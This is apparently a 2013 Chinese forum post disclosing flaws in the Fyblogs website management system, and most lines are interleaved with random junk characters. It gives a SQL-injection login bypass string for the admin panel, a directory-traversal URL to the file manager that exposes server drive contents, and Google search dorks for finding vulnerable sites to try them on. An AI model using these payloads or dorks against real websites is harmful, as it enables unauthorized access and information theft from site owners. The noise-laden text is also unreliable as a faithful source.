漏洞类型: 未授权访问/权限绕过. ]4 l" Q; N/ i& |) z. ~( s
$ V/ w- q$ \1 O! N( j
简要描述:
$ u/ Y$ c9 U+ p1 \# K2 y/ q) b& u* d- |- r) q& p3 h/ l5 R
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ m- d4 o/ x+ B$ F6 d" D8 S
+ Y" e/ B, A& J# i1 u9 b ]
详细说明:
P c7 G: X" s+ }- u
+ `8 H7 N& h2 d8 B. C9 B* o后台万能密码 'or'='or'
3 B1 S8 h4 [. m0 f& J后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) R% z) p; g0 Q; }' x# l
admin/uploadfile.asp?currentFolder=/upfiles/../
8 C7 T% W0 a" l
" r9 p1 [! H4 ?* G3 [) z+ d漏洞证明:3 y) q6 h! }3 E" l+ E" I/ }
1 e, o- o6 o4 H Z; W* P" d谷歌:inurl:type.asp?id=1 新闻中心
' z) N u2 x. B- [: H- F/ n4 h7 |或者 :inurl:download_ok.asp?4 ?& G7 S ~- G% ~
" o! n- k9 C& |! N) P M! [
可以测试: Q/ F& ~4 ?9 |+ I9 }2 L2 o
, `1 o; I) q* ]" \" Z" F6 {$ R+ S) ^% p' f
|
发表于 2013-3-7 13:07:46
收藏
支持
反对